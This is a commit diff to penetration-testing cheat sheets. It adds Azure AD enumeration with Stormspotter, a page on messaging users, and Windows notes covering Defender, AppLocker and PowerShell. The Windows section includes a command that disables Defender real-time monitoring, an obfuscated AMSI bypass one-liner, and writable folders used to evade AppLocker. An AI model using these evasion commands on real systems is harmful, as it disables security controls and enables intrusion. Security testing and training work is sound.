Misc & Tricks Page + AMSI + Defender

This commit is contained in:
Swissky 2020-05-16 13:22:55 +02:00
parent 81655945f9
commit c1731041b5
3 changed files with 81 additions and 3 deletions

View file

@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds
PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
```
Stormspotter, graphing Azure and Azure Active Directory objects
```powershell
$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
git clone https://github.com/Azure/Stormspotter
cd Stormspotter
pipenv install .
stormspotter --cli
stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
Browse to http://127.0.0.1:8050 to interact with the graph.
```
Other interesting commands to enumerate Azure AD.
```powershell
# Azure AD powershell module
@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
## References
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)

View file

@ -0,0 +1,17 @@
# Miscellaneous & Tricks
All the tricks that couldn't be classified somewhere else.
## Send a message to another user
```powershell
# Windows
PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
# Linux
$ wall "Stop messing with the XXX service !"
$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root
$ who
$ write root pts/2 # press Ctrl+D after typing the message.
```

View file

@ -6,7 +6,11 @@
* [Windows Version and Configuration](#windows-version-and-configuration)
* [User Enumeration](#user-enumeration)
* [Network Enumeration](#network-enumeration)
* [AppLocker Enumeration](#applocker-enumeration)
* [Antivirus & Detections](#antivirus--detections)
* [Windows Defender](#windows-defender)
* [AppLocker Enumeration](#applocker-enumeration)
* [Powershell](#powershell)
* [Default Writeable Folders](#default-writeable-folders)
* [EoP - Looting for passwords](#eop---looting-for-passwords)
* [SAM and SYSTEM files](#sam-and-system-files)
* [Search for file contents](#search-for-file-contents)
@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
## AppLocker Enumeration
## Antivirus & Detections
### Windows Defender
```powershell
# check status of Defender
PS C:\> Get-MpComputerStatus
# disable Real Time Monitoring
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
```
### AppLocker Enumeration
- With the GPO
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
List AppLocker rules
```powershell
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
```
### Powershell
Default powershell locations in a Windows system.
```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
Example of AMSI Bypass.
```powershell
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
```
### Default Writeable Folders
```powershell
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
## EoP - Looting for passwords
### SAM and SYSTEM files